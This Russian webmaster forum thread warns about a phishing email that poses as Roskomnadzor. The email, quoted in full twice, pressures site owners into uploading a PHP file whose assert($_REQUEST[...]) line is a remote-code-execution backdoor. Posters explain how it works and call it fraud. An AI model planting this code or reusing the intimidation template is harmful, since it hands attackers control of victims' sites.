Sign in to follow this  
Followers 0
rafonets

Как взломать СВОЙ сайт за 72 часа

20 posts in this topic

Отправитель: zapret-info@roskomnadzor.org

Получатель: adv@saitebi.biz

 

С roskomnadzor.org идет 301 редирект на нужный сайт в зоне gov.ru

 

Сообщение:

 

bf4f7-clip-89kb.png?nocache=1

 

 

Цитата из php.net:

 

 

bool assert ( mixed $assertion [, string $description ] )
Если assertion задается в виде строки, оно будет рассматриваться функцией assert() как PHP код

 

Для непонятливых, внедрив этот код в сайт, злоумышленник сможет выполнить любой PHP код на Вашем сайте)) В точности загрузить Шеллы, разместить рекламу и все прочее.

 

 

Всем удачи,

rafonets

 

Share this post


Link to post
Share on other sites

Я бы еще текст из письма текстом разместил - так сообщение (и информацию к сведению) прочитало бы больше аудитории

rafonets and Alex Bang like this

Share this post


Link to post
Share on other sites

Я бы еще текст из письма текстом разместил - так сообщение (и информацию к сведению) прочитало бы больше аудитории

Пытался, не получилось ... 

 

Выводило ошибку: "Ошибка загрузки расширения файла" - или как-то так. Там некоторые символы на английские заменены и т.д. Видимо предусмотрели заранее... Хотя..., попробую вот так:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени saitebi.biz в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтsaitebi.biz был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени saitebi.biz, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени saitebi.biz*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: saitebi.biz/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени saitebi.biz, следую инструкции указанной выше, то Ваш сайт saitebi.biz будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Share this post


Link to post
Share on other sites

Прикольная замануха) надо проверить на знакомых, на сколько они доверчивы всякой такой ерунде)

rafonets likes this

Share this post


Link to post
Share on other sites

Прикольная замануха) надо проверить на знакомых, на сколько они доверчивы всякой такой ерунде)

у вас ссылка битая в подписи)

Share this post


Link to post
Share on other sites

у вас ссылка битая в подписи)

Огооо спасибо :o  ;) . Странно, глюк какой-то. Норм ставил)

Share this post


Link to post
Share on other sites

Ой, да всякое приходит. То лицензию купите, то купили она не правильный код при проверки отдаёт. То найдена новая дыра на сайте, залатайте и код.

Только у вас смотрю сложный какой-то. Обычно строка приходит, которую вставить нужно.

Share this post


Link to post
Share on other sites

Это обман, чистой воды. Прикидываются Роскомнадзорам и через специальный код получают возможность размещать на Вашем сайте все, что им вздумается. Уже, чтобы с ними разобраться, направили обращения в ФСБ и МВД. На самых разных IT-сайтах читал такие новости. Так что ни в коем случае не отвечайте и не размещайте вредоносный код. Причем, это уже не первая подобная "акция" в этом году.

Share this post


Link to post
Share on other sites

Самое ппечальное то, что некоторые, а то и многие, обделаются и разместят код, даже не разобравшись что это за код. Ведь тут фишка в том, что психологически давят федеральной службой и человек забывает о том, что это может быть фейк :(

 

Умно, ничего не скажешь. Скоро, якобы, от ФСБ будут рассылки делать :)

raynar likes this

Share this post


Link to post
Share on other sites

Самое ппечальное то, что некоторые, а то и многие, обделаются и разместят код, даже не разобравшись что это за код. Ведь тут фишка в том, что психологически давят федеральной службой и человек забывает о том, что это может быть фейк :(

 

Умно, ничего не скажешь. Скоро, якобы, от ФСБ будут рассылки делать :)

direkt-yandex.ru - закажите рекламу в яндексе или Вам светит АГС  B)

 

Подсказку дал, нужен домен, сайт, форма оплаты и рассылка спама, умно написанного спама  :D  Куда проще чем какие-то коды внедрять в сайты, особенно, если посещаемость сайта 1400, а они пишут, больше 3000 и каталог сайтов превращают в блог.

 

UPD: лень стало писать бота, который бы чекнул запрос к папке и нужному файлу и заблочил бы IP + посмотрел бы какой код внедряют и что делают ), а надо было ).

Edited by rafonets

Share this post


Link to post
Share on other sites

direkt-yandex.ru - закажите рекламу в яндексе или Вам светит АГС  B)

 

Подсказку дал, нужен домен, сайт, форма оплаты и рассылка спама, умно написанного спама  :D  Куда проще чем какие-то коды внедрять в сайты, особенно, если посещаемость сайта 1400, а они пишут, больше 3000 и каталог сайтов превращают в блог.

 

UPD: лень стало писать бота, который бы чекнул запрос к папке и нужному файлу и заблочил бы IP + посмотрел бы какой код внедряют и что делают ), а надо было ).

Ну да. Или yandeks.ru или gogle.ru

 

Да по e-mail фигня всё это. Если Вы реально будете что-либо делать, что Вами заинтересуются службы, то Вас вызовут повесткой и сайт будет заблокирован без предупреждения. А так, не обращайте внимания ;)

rafonets likes this

Share this post


Link to post
Share on other sites

Ну да. Или yandeks.ru или gogle.ru

 

Да по e-mail фигня всё это. Если Вы реально будете что-либо делать, что Вами заинтересуются службы, то Вас вызовут повесткой и сайт будет заблокирован без предупреждения. А так, не обращайте внимания ;)

Перефразирую, вообщем, если понадобится Вас из под земли достанут, а не на эмайл спамить будут. Ошибка в том, что они не написали хостеру , вторая ошибка сообщение отправили на мыло указанное на сайте, а не в войс и третья не написали регистратору домена. Вообщем-то еще раз, им еще учиться и учиться...
Irakez likes this

Share this post


Link to post
Share on other sites

 

Пытался, не получилось ... 

 

Выводило ошибку: "Ошибка загрузки расширения файла" - или как-то так. Там некоторые символы на английские заменены и т.д. Видимо предусмотрели заранее... Хотя..., попробую вот так:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени saitebi.biz в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтsaitebi.biz был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени saitebi.biz, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени saitebi.biz*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: saitebi.biz/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени saitebi.biz, следую инструкции указанной выше, то Ваш сайт saitebi.biz будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

А сколько же веб-мастеров самоделкиных, которые сами пытаются что-то создать похожее на сайт своими руками, а потом получают такие письма и конечно же размещают все что им говорят на своих сайтах. Вот на таких просточков и рассчитывают мошенники.

BITbOK likes this

Share this post


Link to post
Share on other sites

Мой хостинг, прислал уведомление, что это мошенничество всё!

470986feefcd1938f89fa40e52eccc7f.png

Мне тоже что-то подобное Бегет присылал.

А некоторые реально могут на это повестись, как сказал человек выше)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0

  • Recently Browsing   0 members

    No registered users viewing this page.